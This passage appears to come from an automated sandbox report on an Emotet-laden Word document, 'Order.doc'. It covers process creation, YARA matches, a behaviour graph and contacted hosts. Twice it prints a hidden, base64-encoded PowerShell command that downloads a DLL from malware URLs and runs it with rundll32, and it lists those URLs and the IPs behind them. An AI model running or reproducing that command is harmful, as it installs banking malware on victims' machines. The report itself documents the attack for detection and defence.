AFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2097063566.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2336211532.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2097445507.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101634327.0000000000720000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092704885.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2096952501.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2336195679.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101426694.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098032897.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2095103110.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101331684.0000000000370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2094951149.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2336233664.00000000002D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 10.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.870000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.870000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 344065 Sample: Order.doc Startdate: 25/01/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Antivirus detection for URL or domain 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 13 other signatures 2->60 13 cmd.exe 2->13         started        16 WINWORD.EXE 293 24 2->16         started        process3 file4 68 Suspicious powershell command line found 13->68 70 Very long command line found 13->70 72 Encrypted powershell cmdline option found 13->72 19 powershell.exe 16 9 13->19         started        24 msg.exe 13->24         started        44 C:\Users\user\Desktop\~$Order.doc, data 16->44 dropped signatures5 process6 dnsIp7 48 nightlifemumbai.club 172.217.6.174, 49165, 80 GOOGLEUS United States 19->48 50 shop.nowfal.dev 104.21.88.166, 443, 49166 CLOUDFLARENETUS United States 19->50 46 C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll, PE32 19->46 dropped 64 Powershell drops PE file 19->64 26 rundll32.exe 19->26         started        file8 signatures9 process10 process11 28 rundll32.exe 26->28         started        process12 30 rundll32.exe 2 28->30         started        signatures13 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->74 33 rundll32.exe 30->33         started        process14 process15 35 rundll32.exe 1 33->35         started        signatures16 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->62 38 rundll32.exe 35->38         started        process17 process18 40 rundll32.exe 9 38->40         started        dnsIp19 52 190.55.186.229, 49167, 80 TelecentroSAAR Argentina 40->52 66 System process connects to network (likely due to code injection or exploit) 40->66 signatures20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.88.166
 unknown United States
13335 CLOUDFLARENETUS true
172.217.6.174
 unknown United States
15169 GOOGLEUS true
190.55.186.229
 unknown Argentina
27747 TelecentroSAAR true

Contacted Domains

Name IP Active
shop.nowfal.dev 104.21.88.166 true
nightlifemumbai.club 172.217.6.174 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://nightlifemumbai.club/x/0wBD3/ true
  • 5%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://190.55.186.229/efl8dd1i/ true
  • Avira URL Cloud: safe
 unknown